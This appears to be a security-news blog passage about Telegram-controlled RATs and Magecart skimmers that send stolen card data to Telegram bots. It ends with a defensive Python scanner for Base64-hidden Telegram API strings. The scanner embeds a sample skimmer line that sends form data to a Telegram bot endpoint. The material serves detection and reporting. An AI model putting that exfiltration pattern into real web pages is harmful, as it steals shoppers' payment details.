G DATA experts write that T-RAT is just one of many malware families equipped with Telegram-based control, and it is not the first RAT to operate on such a model. Similar functionality is found in RATAttack (targeting Windows), HeroRAT (targeting Android), TeleRAT (used mainly against users from Iran, targeting Android), IRRAT (targeting Android), RAT-via-Telegram (available on GitHub, targeting Windows users) and Telegram-RAT (available on GitHub, targeting Windows users).

“New T-RAT samples are regularly uploaded to VirusTotal. I assume that it is actively spreading, although I have no direct evidence of this”, – says company expert Karsten Hahn.

Let me remind fans of classic horror stories about viruses and monsters that the Alien malware steals passwords from 226 Android apps.

Magecart groupings extract stolen cards data via Telegram (https://gridinsoft.com/blogs/magecart-groupings-extract-stolen-cards-data-via-telegram/, published Fri, 04 Sep 2020 16:12:42 +0000)

An information security specialist known under the pseudonym Affable Kraut discovered that Magecart web skimmer operators exfiltrate stolen card data through Telegram channels.

He concluded this based on information obtained by Sansec, which specializes in combating digital skimming and Magecart attacks.

Let me remind you that the name MageCart was initially assigned to a single hacking group, the first to plant web skimmers (malicious JavaScript) on the pages of online stores to steal bank card data.

“Such an approach was so successful that the group soon had numerous imitators, and the name MageCart became a common name; now it refers to a whole class of such attacks”, – recall specialists of the information security company RiskIQ.

In 2018, RiskIQ researchers identified 12 such groups; by the end of 2019, according to IBM, there were already about 40 of them.

The researcher studied one of these malicious scripts and noticed that it collects all data from the input fields filled in by victims and sends it to Telegram.

[Image: Magecart extract card data]

All transmitted information is encrypted with a public key, and once it arrives, a dedicated Telegram bot posts the stolen data into the chat as ordinary messages.

[Image: Magecart extract card data]

Affable Kraut notes that this method of data theft is apparently very effective, but it has a significant disadvantage: anyone who holds the Telegram bot’s token can take control of the process.

Malwarebytes’ lead researcher, Jérôme Segura, also took an interest in the script, and after examining it, he said that the author of this web skimmer used simple Base64 encoding to obscure the bot ID, the Telegram channel and the API requests. Below you can see the diagram drawn by Segura describing the entire attack process.

[Image: Magecart extract card data]

The researcher notes that data theft occurs only if the current URL in the browser contains one of the keywords indicating that this is an online store, and only when the user confirms the purchase. The payment details will then be sent to both the payment processor and the cybercriminals.

Jérôme Segura writes that such a data exfiltration mechanism is a very practical solution, because it lets attackers avoid building dedicated infrastructure for the purpose. In addition, defending against this type of skimmer will not be easy. Blocking Telegram connections would only be a temporary solution, since the attackers can then switch to another legitimate service, which would equally mask the “leak” of data.
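An added example, not code from Segura, Kraut or Sansec: a defender-side scan that decodes Base64 literals found in a page script and checks them, together with the plain source, for Telegram Bot API strings of the kind Segura found hidden in the skimmer. The indicator list, the sample script fragment and the <TOKEN> placeholder are constructed for this demonstration.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Strings a Telegram-exfiltrating script must contain somewhere (constructed list;
# extend with other legitimate services the skimmer could switch to).
INDICATORS = ["api.telegram.org", "/sendMessage", "chat_id="]

# Runs of Base64 alphabet long enough to hold a hostname, with optional padding.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_text(candidate: str) -> Optional[str]:
    """Decode a Base64 candidate; return text only if it is (almost all) printable ASCII,
    which filters out identifiers such as 'encodeURIComponent' that merely look like Base64."""
    data = candidate.rstrip("=")
    data += "=" * (-len(data) % 4)
    try:
        raw = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("ascii", errors="replace")
    printable = sum(1 for ch in text if 0x20 <= ord(ch) <= 0x7E)
    return text if printable >= 0.9 * len(text) else None


def scan_script(source: str) -> List[Dict[str, str]]:
    """Report each indicator found in the plain source or inside a decoded Base64 literal."""
    findings: List[Dict[str, str]] = []
    for ind in INDICATORS:
        if ind in source:
            findings.append({"indicator": ind, "encoding": "plain"})
    for literal in BASE64_RE.findall(source):
        decoded = decode_base64_text(literal)
        if decoded is None:
            continue
        for ind in INDICATORS:
            if ind in decoded:
                findings.append({"indicator": ind, "encoding": "base64", "literal": literal})
    return findings


# Constructed fragment mimicking the obfuscated exfiltration call: the bot endpoint is
# Base64-encoded and only decoded at runtime, so a plain grep for "telegram" finds nothing.
ENCODED_ENDPOINT = base64.b64encode(b"https://api.telegram.org/bot<TOKEN>/sendMessage").decode("ascii")
SAMPLE_SCRIPT = (
    'var u = atob("' + ENCODED_ENDPOINT + '");\n'
    'new Image().src = u + "?chat_id=" + atob("MTIzNDU2Nzg5") + "&text=" + encodeURIComponent(payload);\n'
)

if __name__ == "__main__":
    for finding in scan_script(SAMPLE_SCRIPT):
        print(finding)
```

The scan flags the plain `chat_id=` parameter and, after decoding, both the Telegram API host and the `sendMessage` method; the same approach extends to other encodings a skimmer might use.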

Let me remind you that scientists have developed an attack that allows paying with Visa cards without entering a PIN code.
